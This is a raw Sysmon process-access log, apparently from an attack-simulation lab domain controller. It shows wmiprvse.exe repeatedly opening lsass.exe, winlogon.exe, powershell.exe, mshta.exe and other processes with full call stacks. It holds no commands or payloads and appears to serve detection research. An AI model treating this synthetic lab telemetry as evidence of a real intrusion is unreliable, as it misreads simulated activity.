15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8206-00000000A301}4644C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8106-00000000A301}7892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5373-6008-8006-00000000A301}7224C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 